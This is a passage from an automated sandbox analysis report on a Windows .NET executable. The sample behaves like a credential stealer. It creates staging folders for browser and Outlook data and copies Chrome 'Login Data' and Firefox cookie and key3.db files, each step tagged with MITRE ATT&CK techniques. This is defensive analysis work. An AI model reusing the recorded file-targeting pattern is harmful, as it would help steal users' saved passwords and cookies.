\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformationW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateDirectory (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FindFirstFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FindNextFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetTempPath (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetTempFileName (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetTempFileNameW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CopyFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter UnmapViewOfFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter DeleteFile (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RasEnumConnections (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RasEnumConnectionsW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WSASocket (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter setsockopt (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WSAEventSelect (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter ioctlsocket (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FormatMessage (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotification (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotificationW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e002203f26b@ADVAPI32.dll\"\n \"0d000e00fe02f26b@ADVAPI32.dll\"\n \"0b000c00cc02f26b@ADVAPI32.dll\"\n \"10001100da02f26b@ADVAPI32.dll\"\n \"15001600c03e186b@ADVAPI32.dll\"\n \"0e000f00703f186b@ADVAPI32.dll\"\n \"0e000f00cc3f186b@ADVAPI32.dll\"\n \"11001200b447186b@ADVAPI32.dll\"\n \"110012004848186b@ADVAPI32.dll\"\n \"120013008c48186b@ADVAPI32.dll\"\n \"12001300e448186b@ADVAPI32.dll\"\n \"14001500386e186b@ADVAPI32.dll\"\n \"14001500506e186b@ADVAPI32.dll\"\n \"14001500686e186b@ADVAPI32.dll\"\n \"17001800806e186b@ADVAPI32.dll\"\n \"0d000e00986e186b@ADVAPI32.dll\"\n \"11001200a86e186b@ADVAPI32.dll\"\n \"11001200bc6e186b@ADVAPI32.dll\"\n \"0f001000fc6f186b@ADVAPI32.dll\"\n \"140015003c70186b@ADVAPI32.dll\"\n \"140015005470186b@ADVAPI32.dll\"\n \"0c000d009c70186b@ADVAPI32.dll\"\n \"0c000d00ac70186b@ADVAPI32.dll\"\n \"0e000f00bc70186b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Browsers (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Browsers\\Google (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Browsers\\Firefox (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files\\Outlook Files (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files\\My Videos (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files\\My Pictures (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files\\My Music (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files\\hancom (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\44\\Files\\Amazon Downloader Logs (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateDirectoryW\" with parameter %PUBLIC%\\g4h7miqt.default (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %APPDATA%\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\places.sqlite to new location %TEMP%\\tmpD123.tmp.tmpdb (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %USERPROFILE%\\Documents\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt to new location %ALLUSERSPROFILE%\\44\\Files\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data to new location %TEMP%\\tmpD1C0.tmp.dat (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data to new location %TEMP%\\tmpD460.tmp.dat (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data to new location %TEMP%\\tmpD471.tmp.dat (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %APPDATA%\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\cookies.sqlite to new location %TEMP%\\tmpD52D.tmp.tmpdb (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CopyFileW\" to copy %APPDATA%\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\key3.db to new location %PUBLIC%\\g4h7miqt.default\\key3.db (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 636D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74F50000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched \"NDP SymBinder\" (Path: \"HKCU\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\INPROCSERVER32\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,adc\tbyte ptr [ecx], dl,adc\tal, byte ptr [eax],or\tbyte ptr [edi], al,or\tdword ptr [esi], eax,or\tal, byte ptr [0x30c040b],or\teax, 0xf010e02,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax + eax], cl,or\tbyte ptr [eax], al,mov\tword ptr [eax], es,or\tbyte ptr [eax], al,dec\tesp,add\tbyte ptr [eax], cl,add\tah, cl,add\tbyte ptr [eax], cl,add\tbyte ptr [eax + eax], ch,or\tbyte ptr [eax], al,lodsb\tal, byte ptr [esi],add\tbyte ptr [eax], cl,add\tbyte ptr [eax + eax + 8], ch,add\tah, ch,add\tbyte ptr [eax], cl,add\tbyte ptr [eax + eax], bl,or\tbyte ptr [eax], al,pushfd\t,add\tbyte ptr [eax], cl,add\tbyte ptr [eax + eax + 8], bl,add\tah, bl,add\tbyte ptr [eax], cl,add\tbyte ptr [eax + eax], bh,or\tbyte ptr [eax], al,mov\tesp, 0x7c000800,add\tbyte ptr [eax], cl,add\tah, bh,add\tbyte ptr [eax], cl,add\tbyte ptr [edx], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ac0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"KERNEL32\" at base 77300000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"ADVAPI32.DLL\" at base 75810000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6be50000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"SHLWAPI.DLL\" at base 77410000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"VERSION.DLL\" at base 748d0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 64ae0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"USER32.DLL\" at base 77080000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module 